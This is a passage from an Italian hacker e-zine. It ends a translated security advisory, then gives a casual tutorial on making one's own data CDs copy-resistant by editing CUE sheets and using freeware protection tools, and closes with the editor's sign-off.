http://security.sdsc.edu/self-help/alcatel VII. Workarounds e patches Nessuna conosciuta al momento. VIII. Autori Tsutomu Shimomura Tom Perrine The San Diego Supercomputer Center SDSC is sponsored by the National Science Foundation through NPACI and by other federal agencies, the State and the University of California, and private organizations. For additional information about SDSC, see http://www.sdsc.edu/ Traduzione a cura di {Cujo} ··························································································· ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× __ __ ___ __ __ ___ __ __| __ __ __ _|_ ___ _|_ _|_ o (___ | ' (__/_ (__( | ' (__/_ (___ (__| |__) | ' (__) |_, (__/_ |_, |_, | ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: Come creare cd nostri protetti dalla copia] [Autore: Space|ce] [e-mail: spaceice@freemail.it] N.d.R. questo artikolo rikorda l'artikolo di Rhost sulla masterizzazione... ma questo è trattato più approfonditamente, quindi... eccovelo! :) ******Dedicato a:****** -Me stesso che anke per oggi ho sbarcato il lunario...ehm non in questo modo!!! eheheh -vari programmi per proteggere nostri cd, anche quelli non citati da me, che se ne avete vi pregherei di informarmene. -Cdrwin, che è uno dei pochi a gestire i .cue da cui come avete visto partono molte modifiche per i layout del cd....ed anke uno dei pochi a gestire .bin. -la donna veramente speciale che non ho ancora, e deve essere davvero speciale visto che non l'ho ancora trovata tra le tante che abitano questo mondo!! :) -i miei masterizzatori Yamaha e Plextor che dopo varie fantomatiche prove di ogni tipo, è come se io e voi andassimo a mangiare una volta ogni due sere, in un ristorante messicano ed ordinassimo sempre la pietanza + piccante, i miei Yamaha e Plextor reggono ankora benissimo...io e voi invece reggeremo molto di meno!! :))) --- cat NostriCDProtetti --- #include #include #define autore "Space|ce" #define stronzate "ultimi minuti di libertà scrot scrot....buuUUUUurp...prooot...by Homer Simpsons" int main(void); /* Ops penso di aver sbagliato guida...eheheheheh */ Stiamo per vedere come creare cd nostri protetti dalla copia da parte di terzi, possiamo applicare queste protezioni a qualsiasi cd di dati. Piccola premessa...non sognatevi di creare protezioni DiscGuard o SecuRom eheh si tratta solo di protezioni blande, che l'utente esperto riuscirebbe a bipassare, in quanto noi ci vogliamo proteggere dal lamer idiota, non dall'utente che ha imparato e ke mette in pratica ciò ke sa. Cmq tutte queste protezioni bloccano la masterizzazione subito all'inizio, sempre a causa di errori strani ke non ne permettono la creazione dell'immagine, e assolutamente non si è in grado di creare file decriptanti che analizzino il contenuto del cd e pongano delle firme digitali in modo da creare si la copia masterizzata ma fallata e non eseguibile. ******Disclaimer****** Non mi ritengo responsabile dei danni che creerete al vostro computer o a quello di altri, ai vostri cd e a qualsiasi dato contenuto in esso. Sappiate che tali protezioni non danneggiano i vostri masterizzatori in nessun modo, ma se dovesse accadere sicuramente è stato per un vostro azzardo o procedura sbagliata da voi, io stesso ho provato tali protezioni per cd, tutte legali e freeware, e non è mai capitato nessun danno, quindi non mi assumo nessuna responsabilità in materia. ******INDICE:****** Metodo 1 - Falsi Files Metodo 2 - Falsi Files advanced Metodo 3 - Freelock Metodo 4 - CD Protector Metodo 5 - TZCopy Protection Metodo 6 - Winlock 2000 ******Metodo 1: introduzione di falsi files****** Con questo metodo, si otterrà un cd con 2 tracce dati, che produce una tabella dei contenti illegale, ed il cd risulterà incopiabile. Create un file di immagine del CD sull' hard-disk, ottenendo la prima traccia in mode2. Il file cue, avrà un aspetto simile a questo: (lo potete editare con il notepad di windows) FILE "C:\TEMP\IMAGE.BIN" BINARY TRACK 01 MODE2/2352 INDEX 01 00:00:00 Ora, far partire Cdrwin, in record disk, andare su Load Cuesheet, e leggere il "total disc time", la durata del cd in minuti, dovrebbe essere 32.36.12, quindi 32 minuti, 36 secondi, e 12 decimi di secondo Adesso abbiamo il file cue che contiene le informazioni relative alla prima traccia, dobbiamo mettere le informazioni per una seconda traccia. modifichiamo il file cue nel seguente modo: FILE "C:\TEMP\IMAGE.BIN" BINARY TRACK 01 MODE2/2352 INDEX 01 00:00:00 TRACK 02 MODE2/2352 INDEX 01 32:34:12 (la durata totale meno due secondi,vedremo poi il motivo) Adesso facciamo partire Cdrwin, andiamo in record disc, quindi in disc layout, la seconda traccia, aggiunta, parte a 32.36.12, e non a 32.34.12, questo perchè tra una traccia e l'altra ci deve essere una pausa di 2 secondi, con questo "artificio", la seconda traccia inizia non appena la prima termina! A questo punto, non resta che registrare il cd con Cdrwin, nel quale avrete due tracce dati! Il cd funzionerà senza problemi come sempre, ma non è copiabile, a meno ke non usiate Nero Burning Rom disattivando appunto la seconda traccia ke in tale cdr burning viene vista anke se è attaccatissima alla prima. Questa protezione, funzione con cd psx, pc anche in modalità mista (mixed mode) e con cd audio, da cui i brani però potranno essere copiati senza nessuna difficoltà con un'estrazione audio digitale, quindi non servirebbe a niente se non ad aver sprecato tempo. ******Metodo 2: introduzione di falsi files****** Ecco un secondo metodo per creare cd protetti dalla copia, con l'introduzione di falsi files, questa volta non saranno copiabili neppure con Nero, e vi servirà il buon CloneCD, proprio xké abbiamo creato una prima traccia dati seguita da una seconda fasulla in modalità diversa dalla prima ....il cd funzionerà cmq regolarmente ma la copia non verrà assolutamente creata, dandovi parecchi errori subito all'inizio. Eseguire il processo seguente, ma quando si modifica il file cue, invece di aggiungere (lo potete editare con il notepad di windows) TRACK 02 MODE2/2352 INDEX 01 32:34:12 cambiare la prima riga in "track 02 mode1/2352", la seconda resta inalterata, più in generale, bisogna mettere la seconda traccia in modo che venga scritta in modalità diversa dalla prima, ad esempio se la prima traccia è mode1, la seconda sarà mode2, o viceversa! Il file ke diventerà alla fine: FILE "C:\TEMP\IMAGE.BIN" BINARY TRACK 01 MODE2/2352 INDEX 01 00:00:00 TRACK 02 MODE1/2352 INDEX 01 32:34:12 Vi segnalo questo programma per editare i file cue: "CDRCue Cuesheet Editor" (http://www.dcsoft.com/prod03.htm) ******Metodo 3: Freelock****** materiale richiesto: -Cdrwin (lo trovate ovunque) -Freelock (ops non c'è nessun url ehm..chiedetemelo) -1 floppy 3.5" vuoto (lo trovate in qualsiasi negozio, supermercato, tabacchi, macellerie :) ...by vobis pub) Freelock è un programmino che altera il layout del cd, prima della masterizzazione, rendendo la copia difficile. Scompattate freelock in una directory. Ora vi serve un floppy da 1.44 Mb, formattato, (senza nessun dato) e non protetto dalla scrittura. Andate nella directory in cui avete scompattato il file, e lanciate il file INSTALL.BAT, il dischetto, a questo punto, conterrà due file: Freelock.exe e Freelock.txt Adesso, fate partire Cdrwin, e create un file immagine, memorizzatelo in una cartella qualsiasi. Mettete un cd vergine nel masterizzatore, abbiamo ora due file nella directory in cui avete messo l'immagine: "image.bin" ed "image.cue", dove image sta per il nome dell'immagine che avete scelto. Ora andate al prompt del dos e digitate: A:\freelock image.cue e quindi premere INVIO sulla tastiera Come prima, image è il nome dell'immagine Ora, con Cdrwin, create il Cd, lasciando il dischetto nel floppy, alla fine della scrittura, verrà dato un messaggio di errore, non vi preoccupate, ora il cd è protetto. Ovviamente tale protezione è scansabile, potete esarla sia su cd psx ke pc. ******Metodo 4: CD Protector****** materiale richiesto: -Nero (lo trovate ovunque) -CD Protector (http://surf.to/nrgcrew) -1 cd vergine da 650Mb o 700Mb (lo trovate ovunque, anche per strada e soprattutto nei parabrezza e nei lunotti posteriori delle auto :)) ) All'inizio vi avevo detto che non era possibile creare programmi criptati che analizzassero il cd copiato e non lo facessero eseguire, beh questo programma è un po' la dimostrazione che mi sbagliavo, si deve utilizzare solo in accoppiata con Nero. Dunque attivate il programma CD Protector (lo notate attivo anche sulla traybar) nella casella "File to encrypt:" dovete metterci il file .exe che viene utilizzato per avviare il gioco o il programma, insomma quello usato per avviare il vostro cd dati (install.exe, setup.exe, autorun.exe, uno solo di questi, badate il cd dati su hdd deve essere già pronto, non create la protezione prima ancora di fare il cd dati!!), attenzione il file exe deve essere un eseguibile in formato Win9x conforme allo standard PE EXE,qualsiasi altro exe non verrà accettato. In "Custom Message:" scrivete invece un testo a piacere che comparira all'utente che avrà fatto una copia fallata del vostro cd protetto, potete metterci "Ti ho fregato brutto rippatore!!" o "CD Protetto da SpaceCDGuard questa copia non è autorizzata", insomma quel che volete che si attivi nelle copie non autorizzate del vostro cd. Poi in "Phantom Trax directory:" dovete selezionare una directory qualsiasi che volete in cui verra creato un file wave fasullo (è il file di verifica del codice criptato del cd), ci servirà dopo con Nero. In "Encryption Key:" ci dovete mettere una chiave di criptazione in esadecimale, un qualsiasi valore da 00 a FF, il programma consiglia 1A, ma potete metterci tutte quelle che volete e soprattutto cambiatela da cd a cd protetto. Fatto tutto ciò premete sul tasto ACCEPT! che dovrebbe essersi illuminato di rosso, e noterete che nella cartella che avevate scelto per Phantom Trax c'è un file wave di nome "Track#1 - Track#2 Cd-Protector" mentre nella vostra compilation del cd dati, noterete che il file .exe è stato modificato e sono comparsi 4 file nuovi _cdp16.dat, _cdp16.dll, _cdp32.dat e _cdp32.dll (eheheh si assomigliano molto alla protezione Safedisc, forse chi ha programmato tale cd protector ne ha preso spunto). Ora mettete il cd vergine nel masterizzatore (vi dovremmo scrivere più volte in modalità multisessione, se non sapete cos'è, male!). Poi attivate Nero e selezionate "Nuova Compilation" (New Compilation) per creare un "CD Audio", cliccate sul menu a tendina "Opzioni CDA" (CDA-Option) e controllate che siano spuntate le due caselle in fondo "Ottimizza la traccia su disco prima della scrittura" (Cache the track on harddisk before burning) e "Rimuovi silenzio alla fine delle tracce .cda" (Remove silence at the end of *.cda tracks), se non lo sono fatelo. Poi cliccate nel menu tendina "Scrivi" (Burn) e sotto Azioni (Action) selezionate solo la casella "Scrivi" (Write) tutte le altre di questa sezione deselezionatele soprattutto la simulazione (simulation) e chiudi cd (finalize CD), per deselezionare quest'ultima da Nero 5 in su, si deve prima spuntare la casella "Usa Masterizz. Multipli" dopo vi sarà possibile deselezionare la casella chiudi cd. Sempre nelle stessa finestra deselezionate anche la modalità Disc-At-Once e come velocità di scrittura rimanete sui 4x, deselezionate anche tutte le caselle in fondo sulle ottimizzazioni file. Quindi date l'ok, prendete il precedente file wave finto, dalla directory Phantom Trax e mettetelo nella compilation e masterizzate il cd, poi ripete la procedura sempre sullo stesso cd con lo stesso wave finto, e lo rimasterizzate si lo stesso cd, in quanto non lo avete chiuso, e si tratta di una multisessione, alla fine se andrete in "Mostra Tracce" (Select Tracks) in Nero noterete due tracce audio. Fatto ciò ora attivate una nuova compilation, e questa volta scegliete "CD-Rom ISO" andate nel menu tendina "Multisessione" (Multisession) e cliccate su "Inizia a scrivere un disco in multisessione" (start multisession disk), poi andate nel menu tendina "Scrivi" (Burn) e deselezionate le caselle chiudi cd e la modalità Disc-At-One. Quindi date ok, e poi includete tutto il vostro cd dati già modificato da CD Protector con il file exe criptato, fatto ciò potete avviare la masterizzazione e il gioco è concluso. C'è da notare un contro in questa procedura, perché il cdrom che abbiamo creato è un cd multisessione in modalità mista audio e dati, e vecchi lettori cdrom ide (presumo da 16x in giù) non leggono cd multisessione,a meno che non sia specificato diversamente nei suoi dati tecnici. Comunque tutti i masterizzatori sono invece in grado di leggere cd multisessione, ma che tipo di protezione abbiamo creato con tale programma? bene è mia convinzione che questo programma cripti l'eseguibile principale di avvio con una chiave il cui codice è il file wave fasullo, il secondo file wave fasullo = sicuramente serve come verifica per il primo, tali file wave sono di una dimensione fissa di 1.44Mb circa l'uno, quindi vi portano via 2.88Mb dal cdrom e se provate ad ascoltarli funzionano, e si sentono vari suoni tra i quali un grugnito eheheh, il tutto di una durata di neanche 8 secondi, ma se provate ad aprirli con un editor esadecimale (debug) si notano molte stringhe criptate. Dunque se provate a copiare tale cd protetto, verrà copiata solo la traccia dati che non trovando quelle audio non farà partire niente tranne il messaggio che avevate selezionato prima, se poi pensate di copiare le tracce audio singolarmente e poi quella dati, niente da fare ancora perché i file _cdp16.dat ecc..ecc (i 4 ke avevo spiegato su) vengono copiati ma non in modo fisico quindi vengono modificati nella copia. Unico modo per copiare tutto il cd è il CloneCD (anche se l'ultima versione di CD Protect 4 beta ancora non disponibile, crea errori anche con CloneCD) oppure copiare i singoli dati, a meno che non abbiate studiato un prg di decompressione con password attivato dal programma di avvio criptato (proprio come i cd twilight, i quali però ne permettono la masterizzazione di tutto il cd ma non l'estrazione di tutti i singoli programmi). Attenzione tale protezione è utile solo con cdrom dati per PC, assolutamente da non provare con cd PSX, non partirebbero, o con cd audio, non servirebbe a niente perché esiste l'estrazione audio...e poi spiegatemi come fate a criptare un file exe di avvio in un cd audio :))) ******Metodo 5: TZCopy Protection****** materiale richiesto: -Cdrwin (lo trovate ovunque) -TZCopy Protection (http://members.nbci.com/tzcopy/index.html) -file .iso o .bin -file .cue Questo programma è una suite (raccolta) di varie protezioni, selezionabili una alla volta con possibilità di metterle tutte, occorre creare un'immagine del vostro cd dati con Cdrwin in formato .bin o .iso, che a sua volta creerà anche il solito secondo file .cue. Dunque le protezioni selezionabili sono: 1) Modifica della struttura del CD per proteggerlo dai più popolari programmi di masterizzazione. 2) Inserimento di 4 tracce audio oltre a quella nostra dati. (multisessione fasulla) 3) Modifica della dimensione (solo a livello di indice TOC) di un file eseguibile o fittizio che volete voi fino a 900Mb. Avviate TZCopy Protection cliccate su bottone "Open Cue" andate nella directory in cui è la vostra immagine e selezionate il file .cue, poi cliccate su "Viewer" sempre nella stessa directory dove avete messo la vostra immagine selezionate il .bin o .iso a seconda del formato che avevate scelto in Cdrwin, dovrebbe ora comparirvi una lista dei file e directory del vostro cd dati. Per proteggerlo e attuare le modifiche basta che cliccate su "Step 1 secret" per la protezione 1, "Step 2 Second Data Track" per la protezione 2 dopo che avrete selezionato un file, e "Step 3 file modificator" per la protezione 3 dopo che avrete selezionato un file. Eseguite tutte le modifiche riprendete Cdrwin e masterizzate l'immagine modificata, avrete un cd con un bel po' di protezioni, scansabili comunque con Nero o altro prg estrattore di tracce in formato raw. Tali protezioni si possono applicare a qualsiasi cdrom per PC, PSX e audio senza problemi, in quest'ultimo caso però non serve a niente. ******Metodo 6: Winlock 2000****** materiale richiesto: -Cdrwin (lo trovate ovunque) -Winlock 2000 (http://www.diamondcdroms.co.uk) -file .cue Anche questo programma non fa poi molto, come TZCopy si limita a modificare il cue file in modo da generare un layout cd diverso dall'originale, in dettaglio il programma crea 3 tracce nuove, una audio, una in mode1 e una in mode2 attraverso un file fasullo creato da Winlock. Dopo aver creato l'immagine .bin e il suo .cue in automatico, aprite winlock e cliccate su "Create File" serve al programma per creare il file fasullo, poi cliccate su "CueSheet" e impostate il file *.cue della vostra immagine cd, ora lasciando attivo Winlock, andate su Cdrwin selezionate l'immagine cd già modificata e cominciate a masterizzarla, poi tornate in Winlock e cliccate su "Modify" il quale modificherà il file fasullo, Cdrwin dopo un po' darà un errore, non preoccupatevi dategli ok e il tutto è concluso. Vi chiederete...e così ho mandato a puttane il cd...NO..eheheh i vostri dati sono già stati registrati senza problemi, vi spiego cosa è successo...Cdrwin registra prima i vostri dati, poi comincia a registrare le 3 tracce miste al cui interno dovrebbe andare il file fasullo, ma quando Cdrwin comincia la registrazione prende subito in esame il file cue che gli dice la dimensione di tali 3 tracce e del file fasullo, ma se questo viene modificato in dimensione durante tale registrazione causa un errore e non viene scritto, ma le 3 tracce sono state scritte, quindi se provate a copiare tale cdrom, qualsiasi programma di masterizzazione si fermerà subito perché vedrà tali 3 tracce in modo non standard e si rifiuterà di creare qualsiasi immagine di tale cd. Il vostro cd in questo modo è protetto, ma non al 100%, con un qualsiasi programma che estrae le singole tracce si può velocemente individuare l'unica funzionante e basterebbe copiare solo quella. Tale protezione è applicabile su cdrom per PC e PSX (audio non ve lo metto più xké spero abbiate capito che non serve a niente proteggere questi!!). --- EOF NostriCDProtetti --- ··························································································· ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× __ __ __ __ | __ o __ __ ___ (___ (__) | ) (___ |_, (__(_ __) | (__) | ) (__/_ ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [ Titolo: L'abbiamo finita!? :o) ] [ Autore: Cookbooker ] E finisce kosì anke il sekondo numero di Underground Magazine (ke potete trovare su umcrew.tsx.org), numero karatterizzato da molte novità (nuove sezioni, nuovi corsi e nuovi collaboratori) e da artikoli, a mio parere, interessanti :) Ora sono stanko, ho finalmente finito di impaginare (bene o male ;) sto numero... vi saluto, in attesa del terzo numero di una zine ke kontinua a crescere... ma ci sarà un terzo numero? :0o Non c'è 2 senza 3! spero... ;o) ßyeZ, Cookbooker. Hanno kollaborato per la realizzazione di questo numero: Ruolo Nickname e-mail ----------------------------------------------- Redattore: Cookbooker Cookbooker@libero.it Collaboratori: >FeltonSpray ???????????????? >Rhost rhost@post.com >Cujo ???????????????? >EvilAngel ???????????????? >Ulisses1 ???????????????? >Freesto huhii@tin.it >Jrash ???????????????? >SpaceIce ???????????????? ---------------------------------------------- ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× __ __| __ __ __ __ __ __ __| __ __ __ __ __ __ o __ __ (__( | ) (__| (_/_ | ' (__| | ' (__) (__(_ | ) (__| | ) ) (__( (__| (__( (__ | | ) (_/_ __/ __/ _____ _ __ _ _____ | ___| | | | \ | | | ____| | |__ | | | \| | | |__ | __| | | | |\ | | __| | | | | | | \ | | |___ |_| |_| |_| \_| |_____| ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××